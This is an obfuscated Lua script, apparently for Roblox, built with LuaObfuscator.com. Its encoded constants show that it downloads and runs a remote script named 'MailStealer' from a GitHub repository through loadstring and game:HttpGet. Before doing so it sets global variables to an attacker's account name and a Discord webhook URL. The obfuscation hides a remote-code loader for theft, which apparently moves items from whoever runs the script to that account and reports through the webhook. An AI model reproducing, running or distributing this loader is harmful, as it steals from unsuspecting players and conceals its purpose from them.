--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=0 -0 ;local v33;local v34;while true do if (v32==(2 -1)) then return (v34 * 256) + v33 ;end if (v32==(0 -0)) then v33,v34=v1(v16,v19,v19 + ((935 -(857 + 74)) -(570 -(367 + 201))) );v19=v19 + 2 ;v32=620 -((1482 -(214 + 713)) + 64) ;end end end v18=3;end if (v18==4) then function v25()local v35=952 -(802 + 150) ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==(1 + 0)) then v38=1 + 0 ;v39=(v21(v37,878 -(282 + 595) ,1657 -((1953 -(44 + 386)) + 114) ) * ((2 + 0)^(45 -13))) + v36 ;v35=(1488 -(998 + 488)) + 0 ;end if (v35==(1067 -(68 + 997))) then v40=v21(v37,27 -6 ,1301 -(226 + 332 + 712) );v41=((v21(v37,139 -(88 + 19) )==(118 -(32 + 85))) and  -(1 + 0)) or (1 + 0) ;v35=1 + 2 ;end if (0==v35) then v36=v24();v37=v24();v35=1;end if (v35==((1732 -(201 + 571)) -(892 + (1203 -(116 + 1022))))) then if (v40==(0 -0)) then if (v39==(0 -0)) then return v41 * 0 ;else v40=1 -0 ;v38=0 -0 ;end elseif (v40==(2397 -((362 -275) + 263))) then return ((v39==(180 -(67 + 113))) and (v41 * ((443 -(245 + 171 + 26))/(0 + 0)))) or (v41 * NaN) ;end return v8(v41,v40-(2511 -1488) ) * (v38 + (v39/((2 + 0)^(206 -154)))) ;end end end v26=nil;function v26(v42)local v43;if  not v42 then local v84=0 -0 ;while true do if (v84==(0 -0)) then v42=v24();if (v42==(859 -(814 + 45))) then return "";end break;end end end v43=v3(v16,v19,(v19 + v42) -(2 -1) );v19=v19 + v42 ;local v44={};for v67=1 + 0 , #v43 do v44[v67]=v2(v1(v3(v43,v67,v67)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;while true do local v69=718 -(15 + 703) ;while true do if (v69~=1) then else if (v45==(0 + 0)) then local v96=438 -(262 + 176) ;while true do if (v96~=2) then else v45=1;break;end if (v96~=1) then else v48={};v49={v46,v47,nil,v48};v96=690 -(198 + 490) ;end if (v96==0) then v46={};v47={};v96=1;end end end break;end if (v69==0) then if (1~=v45) then else v50=v24();v51={};for v100=4 -3 ,v50 do local v101=0 -0 ;local v102;local v103;local v104;while true do if (v101==0) then local v105=1206 -(696 + 510) ;while true do if (v105==0) then v102=0;v103=nil;v105=1;end if (v105~=1) then else v101=1;break;end end end if (v101==(1 -0)) then v104=nil;while true do if (v102~=(1262 -(1091 + 171))) then else v103=v22();v104=nil;v102=1 + 0 ;end if (v102~=(3 -2)) then else if (v103==(3 -2)) then v104=v22()~=(374 -(123 + 251)) ;elseif (v103==(9 -7)) then v104=v25();elseif (v103==3) then v104=v26();end v51[v100]=v104;break;end end break;end end end v49[701 -(208 + 490) ]=v22();v45=2;end if (v45==2) then local v98=0;local v99;while true do if ((0 + 0)~=v98) then else v99=0 + 0 ;while true do if (v99==(837 -(660 + 176))) then return v49;end if ((0 + 0)==v99) then local v129=0;while true do if (v129~=0) then else for v153=203 -(14 + 188) ,v24() do local v154=0;local v155;local v156;local v157;while true do if (v154==(676 -(534 + 141))) then v157=nil;while true do if (v155==(1 + 0)) then while true do if (v156~=(0 + 0)) then else v157=v22();if (v21(v157,1,1)==0) then local v162=0;local v163;local v164;local v165;local v166;while true do if (v162==0) then v163=0 + 0 ;v164=nil;v162=1 -0 ;end if (v162~=(1 -0)) then else v165=nil;v166=nil;v162=5 -3 ;end if (v162==2) then while true do if (v163~=3) then else if (v21(v165,2 + 1 ,2 + 1 )==(397 -(115 + 281))) then v166[9 -5 ]=v51[v166[4 + 0 ]];end v46[v153]=v166;break;end if (v163==(4 -2)) then if (v21(v165,3 -2 ,868 -(550 + 317) )~=1) then else v166[2]=v51[v166[2]];end if (v21(v165,2,2 -0 )~=(1 -0)) then else v166[3]=v51[v166[8 -5 ]];end v163=3;end if ((286 -(134 + 151))==v163) then local v168=1665 -(970 + 695) ;while true do if (v168~=0) then else v166={v23(),v23(),nil,nil};if (v164==0) then local v176=0;local v177;while true do if (v176==(0 -0)) then v177=0 -0 ;while true do if (v177~=0) then else v166[1827 -(1195 + 629) ]=v23();v166[5 -1 ]=v23();break;end end break;end end elseif (v164==(242 -(187 + 54))) then v166[783 -(162 + 618) ]=v24();elseif (v164==2) then v166[3 + 0 ]=v24() -((2 + 0)^(33 -17)) ;elseif (v164==3) then local v182=0;local v183;local v184;while true do if (v182==0) then v183=0;v184=nil;v182=1 -0 ;end if ((1 + 0)==v182) then while true do if (0==v183) then v184=0;while true do if (v184~=(1636 -(1373 + 263))) then else v166[3]=v24() -(2^16) ;v166[4]=v23();break;end end break;end end break;end end end v168=1;end if (v168==1) then v163=2;break;end end end if (v163==(1000 -(451 + 549))) then local v169=0 + 0 ;while true do if (v169==1) then v163=1 -0 ;break;end if (v169==0) then v164=v21(v157,2 -0 ,1387 -(746 + 638) );v165=v21(v157,2 + 2 ,6);v169=1 -0 ;end end end end break;end end end break;end end break;end if (0==v155) then v156=341 -(218 + 123) ;v157=nil;v155=1582 -(1535 + 46) ;end end break;end if (v154==0) then v155=0 + 0 ;v156=nil;v154=1;end end end for v158=1,v24() do v47[v158-(1 + 0) ]=v29();end v129=1;end if (v129==(561 -(306 + 254))) then v99=1;break;end end end end break;end end end v69=1 + 0 ;end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then v20=v0(v3(v52,1,1));return "";else local v85=v2(v0(v52,16));if v20 then local v91=v5(v85,v20);v20=nil;return v91;else return v85;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53=0 -0 ;local v54;local v55;local v56;local v57;while true do if (v53==(1467 -(899 + 568))) then v54,v55,v56,v57=v1(v16,v19,v19 + (1459 -(282 + 1174)) );v19=v19 + (815 -(569 + 242)) ;v53=1;end if (v53==(1 + 0)) then return (v57 * ((40600501 -(721 + 530)) -(23823305 -(945 + 326)))) + (v56 * (66139 -(268 + 335))) + (v55 * (546 -(60 + 230))) + v54 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v70=v61;local v71=v62;local v72=v63;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v86=0,v78 do if (v86>=v72) then v76[v86-v72 ]=v77[v86 + 1 ];else v80[v86]=v77[v86 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=9) then if (v83<=4) then if (v83<=1) then if (v83==0) then v74=v82[3];else v80[v82[2]]();end elseif (v83<=2) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83>3) then local v131=v82[2];local v132=v80[v82[3]];v80[v131 + 1 ]=v132;v80[v131]=v132[v82[4]];else v74=v82[3];end elseif (v83<=6) then if (v83==5) then local v107=v82[2];v80[v107]=v80[v107](v13(v80,v107 + 1 ,v75));else v80[v82[2]]=v82[3];end elseif (v83<=7) then local v111=v82[2];local v112=v80[v82[3]];v80[v111 + 1 ]=v112;v80[v111]=v112[v82[4]];elseif (v83==8) then v80[v82[2]][v82[3]]=v82[4];else v80[v82[2]]=v60[v82[3]];end elseif (v83<=14) then if (v83<=11) then if (v83==10) then v80[v82[2]][v82[3]]=v82[4];else v80[v82[2]]=v60[v82[3]];end elseif (v83<=12) then local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==1) then v75=(v123 + v121) -1 ;v124=0;v120=2;end if (v120==2) then for v149=v121,v75 do v124=v124 + 1 ;v80[v149]=v122[v124];end break;end if (v120==0) then v121=v82[2];v122,v123=v73(v80[v121](v13(v80,v121 + 1 ,v82[3])));v120=1;end end elseif (v83>13) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else v80[v82[2]]();end elseif (v83<=16) then if (v83==15) then do return;end else local v125=v82[2];v80[v125]=v80[v125](v13(v80,v125 + 1 ,v75));end elseif (v83<=17) then v80[v82[2]]=v82[3];elseif (v83>18) then do return;end else local v141=v82[2];local v142,v143=v73(v80[v141](v13(v80,v141 + 1 ,v82[3])));v75=(v143 + v141) -1 ;local v144=0;for v147=v141,v75 do local v148=0;while true do if (v148==0) then v144=v144 + 1 ;v80[v147]=v142[v144];break;end end end end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v89=(v64/((4 -2)^(v65-(1 + 0 + 0))))%(((73 + 629) -(271 + 429))^(((v66-(1 + 0)) -(v65-(1501 -(1408 + 92)))) + 1)) ;return v89-(v89%(1087 -(461 + 625))) ;else local v90=(1290 -(993 + 295))^(v65-1) ;return (((v64%(v90 + v90))>=v90) and (1 + 0 + 0)) or (1171 -(418 + 753)) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C657225323025453225394325393703023O005F4703093O00557365724E616D657903073O0079756B6936375003083O00576562682O6F6B7903793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132333432313331333437342O37333130322F4537506348416A7866347769377166437A4F4D542O654E54752D4B6F5A536352426B7836586546774B4E4B42432D4D616E5F4B434D4245545033687753394B5350666D4A00143O0012113O00013O00260E3O000B0001000200044O000B000100120B000100033O00120B000200043O002007000200020005001211000400064O000C000200044O000500013O00022O000100010001000100044O0013000100260E3O00010001000100044O0001000100120B000100073O00300A00010008000900120B000100073O00300A0001000A000B0012113O00023O00044O000100012O000F3O00017O00",v9(),...);end
